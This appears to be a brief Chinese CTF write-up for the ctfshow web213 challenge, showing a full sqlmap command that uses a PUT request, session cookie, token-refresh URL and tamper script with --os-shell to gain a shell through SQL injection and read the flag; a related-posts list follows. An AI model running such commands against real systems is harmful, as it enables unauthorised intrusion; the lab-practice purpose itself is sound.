ctfshow-web213

-os--shell参数的使用

复制代码
python sqlmap.py -u "http://b783c400-150f-4971-b2de-45dca654b75a.challenge.ctf.show/api/index.php" --method="PUT" --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=1vrv4fg7q4uid8i1lhma043h20" --safe-url="http://b783c400-150f-4971-b2de-45dca654b75a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web212.py --os-shell

有两个地方需要进行选择:如果是PHP则直接回车默认选择。

这两个地方需要选择正确才能拿到shell。

读取flag。

相关推荐
佳心于琪1 天前
CTFshow——phpCVE
web·ctfshow·phpcve
传奇开心果编程4 天前
【Compose Multiplatform 跨端开发学与练】第8课 资源管理与主题
android·windows·学习·ios·kotlin·web·composer
传奇开心果编程4 天前
【Compose Multiplatform 跨端开发学与练】第9课 测试与调试
android·学习·macos·ios·kotlin·web·composer
hengdonghui4 天前
Writeup 4 红帽杯 2021 WebsiteManger
web·ctf·ssrf·sql布尔盲注
Seraphina365 天前
DVWA(SQL注入-low,medium,XSS反射-low)
前端·数据库·笔记·sql·网络安全·web·xss
hengdonghui6 天前
Writeup 4 津门杯 2021 Web hate_php
php·web·ctf·通配符
kali-Myon6 天前
ARTEX:AI 驱动的自动化漏洞挖掘平台
人工智能·安全·ai·自动化·web
hengdonghui6 天前
Writeup 4 红帽杯 2021 Web Find_It
web·ctf·备份文件泄露
熊猫钓鱼>_>7 天前
MetaAI深度研究研究报告
ai·meta·大模型·llm·agent·web·metaai
PYB312 天前
【Web·基础学习】基础布局
css·html·web